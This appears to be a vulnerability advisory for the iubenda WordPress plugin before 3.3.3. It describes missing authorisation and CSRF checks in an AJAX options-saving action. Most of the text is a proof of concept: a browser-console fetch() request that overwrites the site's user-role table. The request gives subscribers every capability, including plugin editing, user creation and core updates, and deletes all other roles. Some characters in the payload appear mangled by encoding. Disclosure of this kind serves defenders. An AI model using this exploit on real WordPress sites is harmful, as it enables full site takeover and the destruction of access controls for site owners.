iubenda < 3.3.3 - Subscriber+ Privileges Escalation to Admin

The plugin does does not have authorisation and CSRF in an AJAX action, and does not ensure that the options to be updated belong to the plugin as long as they are arrays. As a result, any authenticated users, such as subscriber can grant themselves any privileges, such as edit_plugins etc

PoC

Run the below command in the developer console of the web browser while being on the blog as a subscriber (which will grant all capabilities to the subscriber role, as well as remove other roles completely) fetch(‘/wp-admin/admin-ajax.php?action=ajax_save_options’, { method: ‘POST’,headers:{“content-type”:“application/x-www-form-urlencoded”}, body: “iubenda_section_name=wp_user_roles&wp;_user_roles[subscriber][name]=Subscriber&wp;_user_roles[subscriber][capabilities][switch_themes]=true&wp;_user_roles[subscriber][capabilities][edit_themes]=true&wp;_user_roles[subscriber][capabilities][activate_plugins]=true&wp;_user_roles[subscriber][capabilities][edit_plugins]=true&wp;_user_roles[subscriber][capabilities][edit_users]=true&wp;_user_roles[subscriber][capabilities][edit_files]=true&wp;_user_roles[subscriber][capabilities][manage_options]=true&wp;_user_roles[subscriber][capabilities][moderate_comments]=true&wp;_user_roles[subscriber][capabilities][manage_categories]=true&wp;_user_roles[subscriber][capabilities][manage_links]=true&wp;_user_roles[subscriber][capabilities][upload_files]=true&wp;_user_roles[subscriber][capabilities][import]=true&wp;_user_roles[subscriber][capabilities][unfiltered_html]=true&wp;_user_roles[subscriber][capabilities][edit_posts]=true&wp;_user_roles[subscriber][capabilities][edit_others_posts]=true&wp;_user_roles[subscriber][capabilities][edit_published_posts]=true&wp;_user_roles[subscriber][capabilities][publish_posts]=true&wp;_user_roles[subscriber][capabilities][edit_pages]=true&wp;_user_roles[subscriber][capabilities][read]=true&wp;_user_roles[subscriber][capabilities][level_10]=true&wp;_user_roles[subscriber][capabilities][level_9]=true&wp;_user_roles[subscriber][capabilities][level_8]=true&wp;_user_roles[subscriber][capabilities][level_7]=true&wp;_user_roles[subscriber][capabilities][level_6]=true&wp;_user_roles[subscriber][capabilities][level_5]=true&wp;_user_roles[subscriber][capabilities][level_4]=true&wp;_user_roles[subscriber][capabilities][level_3]=true&wp;_user_roles[subscriber][capabilities][level_2]=true&wp;_user_roles[subscriber][capabilities][level_1]=true&wp;_user_roles[subscriber][capabilities][level_0]=true&wp;_user_roles[subscriber][capabilities][edit_others_pages]=true&wp;_user_roles[subscriber][capabilities][edit_published_pages]=true&wp;_user_roles[subscriber][capabilities][publish_pages]=true&wp;_user_roles[subscriber][capabilities][delete_pages]=true&wp;_user_roles[subscriber][capabilities][delete_others_pages]=true&wp;_user_roles[subscriber][capabilities][delete_published_pages]=true&wp;_user_roles[subscriber][capabilities][delete_posts]=true&wp;_user_roles[subscriber][capabilities][delete_others_posts]=true&wp;_user_roles[subscriber][capabilities][delete_published_posts]=true&wp;_user_roles[subscriber][capabilities][delete_private_posts]=true&wp;_user_roles[subscriber][capabilities][edit_private_posts]=true&wp;_user_roles[subscriber][capabilities][read_private_posts]=true&wp;_user_roles[subscriber][capabilities][delete_private_pages]=true&wp;_user_roles[subscriber][capabilities][edit_private_pages]=true&wp;_user_roles[subscriber][capabilities][read_private_pages]=true&wp;_user_roles[subscriber][capabilities][delete_users]=true&wp;_user_roles[subscriber][capabilities][create_users]=true&wp;_user_roles[subscriber][capabilities][unfiltered_upload]=true&wp;_user_roles[subscriber][capabilities][edit_dashboard]=true&wp;_user_roles[subscriber][capabilities][update_plugins]=true&wp;_user_roles[subscriber][capabilities][delete_plugins]=true&wp;_user_roles[subscriber][capabilities][install_plugins]=true&wp;_user_roles[subscriber][capabilities][update_themes]=true&wp;_user_roles[subscriber][capabilities][install_themes]=true&wp;_user_roles[subscriber][capabilities][update_core]=true&wp;_user_roles[subscriber][capabilities][list_users]=true&wp;_user_roles[subscriber][capabilities][remove_users]=true&wp;_user_roles[subscriber][capabilities][promote_users]=true&wp;_user_roles[subscriber][capabilities][edit_theme_options]=true&wp;_user_roles[subscriber][capabilities][delete_themes]=true&wp;_user_roles[subscriber][capabilities][export]=true&wp;_user_roles[subscriber][capabilities][administrator]=true&wp;_user_roles[subscriber][capabilities][manage_network_users]=true&wp;_user_roles[subscriber][capabilities][manage_network_plugins]=true&wp;_user_roles[subscriber][capabilities][manage_network_themes]=true&wp;_user_roles[subscriber][capabilities][manage_network_options]=true&wp;_user_roles[subscriber][capabilities][create_sites]=true&wp;_user_roles[subscriber][capabilities][delete_sites]=true&wp;_user_roles[subscriber][capabilities][manage_network]=true&wp;_user_roles[subscriber][capabilities][manage_sites]=true&wp;_user_roles[subscriber][capabilities][upload_plugins]=true&wp;_user_roles[subscriber][capabilities][upload_themes]=true&wp;_user_roles[subscriber][capabilities][upgrade_network]=true&wp;_user_roles[subscriber][capabilities][setup_network]=true”, }).then(response => response.text()) .then(data => console.log(data));